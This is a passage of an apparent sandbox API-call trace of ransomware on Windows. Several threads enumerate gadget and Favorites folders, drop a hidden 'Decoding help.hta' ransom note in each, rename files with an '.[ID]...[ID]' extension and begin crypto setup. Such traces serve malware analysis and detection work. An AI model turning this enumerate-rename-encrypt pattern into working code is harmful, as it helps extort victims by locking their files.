Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" [0061.545] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.545] FindNextFileW (in: hFindFile=0x10bc54d0, lpFindFileData=0x2e72fd30 | out: lpFindFileData=0x2e72fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 0 [0061.545] FindClose (in: hFindFile=0x10bc54d0 | out: hFindFile=0x10bc54d0) returned 1 Thread: id = 1004 os_tid = 0xca8 [0060.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2e86fd30 | out: lpFindFileData=0x2e86fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5510 [0060.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.299] FindNextFileW (in: hFindFile=0x10bc5510, lpFindFileData=0x2e86fd30 | out: lpFindFileData=0x2e86fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.299] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.299] FindNextFileW (in: hFindFile=0x10bc5510, lpFindFileData=0x2e86fd30 | out: lpFindFileData=0x2e86fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0060.300] lstrcpyW (in: lpString1=0x11253f08, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0060.300] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned 73 [0060.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" [0060.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x578 [0061.545] WriteFile (in: hFile=0x578, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e86fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e86fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.546] CloseHandle (hObject=0x578) returned 1 [0061.546] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.547] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.js") returned 1 [0061.547] lstrlenW (lpString="calendar.js") returned 11 [0061.547] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0061.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned 73 [0061.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\", lpString2="calendar.js" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" [0061.547] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" [0061.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.547] FindNextFileW (in: hFindFile=0x10bc5510, lpFindFileData=0x2e86fd30 | out: lpFindFileData=0x2e86fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 0 [0061.547] FindClose (in: hFindFile=0x10bc5510 | out: hFindFile=0x10bc5510) returned 1 Thread: id = 1005 os_tid = 0xca4 [0060.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x2e9afd30 | out: lpFindFileData=0x2e9afd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5550 [0060.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.301] FindNextFileW (in: hFindFile=0x10bc5550, lpFindFileData=0x2e9afd30 | out: lpFindFileData=0x2e9afd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.301] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.301] FindNextFileW (in: hFindFile=0x10bc5550, lpFindFileData=0x2e9afd30 | out: lpFindFileData=0x2e9afd30*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.301] lstrcpyW (in: lpString1=0x1125bf10, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0060.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned 53 [0060.301] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Decoding help.hta" [0060.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\decoding help.hta")) returned 0xffffffff [0060.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0061.548] WriteFile (in: hFile=0x48c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e9afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e9afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.549] CloseHandle (hObject=0x48c) returned 1 [0061.549] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.549] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0061.549] lstrlenW (lpString="desktop.ini") returned 11 [0061.549] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0061.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned 53 [0061.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" [0061.549] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" [0061.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0061.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0061.550] CreateFileMappingA (hFile=0x48c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x578 [0061.550] CryptAcquireContextA (phProv=0x2e9afcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 1006 os_tid = 0xe50 [0060.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x2eaefd30 | out: lpFindFileData=0x2eaefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5590 [0060.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.306] FindNextFileW (in: hFindFile=0x10bc5590, lpFindFileData=0x2eaefd30 | out: lpFindFileData=0x2eaefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.306] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.306] FindNextFileW (in: hFindFile=0x10bc5590, lpFindFileData=0x2eaefd30 | out: lpFindFileData=0x2eaefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0060.306] lstrcpyW (in: lpString1=0x11263f18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0060.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned 66 [0060.306] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Decoding help.hta" [0060.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\decoding help.hta")) returned 0xffffffff [0060.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc88 [0061.551] WriteFile (in: hFile=0xc88, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2eaefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2eaefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.552] CloseHandle (hObject=0xc88) returned 1 [0061.552] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.552] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IE Add-on site.url") returned -1 [0061.552] lstrlenW (lpString="IE Add-on site.url") returned 18 [0061.552] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0061.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned 66 [0061.552] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0061.552] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0061.552] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" [0061.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc88 [0061.553] CreateFileMappingA (hFile=0xc88, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x698 [0061.553] CryptAcquireContextA (phProv=0x2eaefcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 1007 os_tid = 0xcac [0060.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x2ec2fd30 | out: lpFindFileData=0x2ec2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc55d0 [0060.308] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.308] FindNextFileW (in: hFindFile=0x10bc55d0, lpFindFileData=0x2ec2fd30 | out: lpFindFileData=0x2ec2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.308] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.308] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.308] FindNextFileW (in: hFindFile=0x10bc55d0, lpFindFileData=0x2ec2fd30 | out: lpFindFileData=0x2ec2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0060.308] lstrcpyW (in: lpString1=0x1126bf20, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0060.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned 60 [0060.308] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\Decoding help.hta" [0060.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\decoding help.hta")) returned 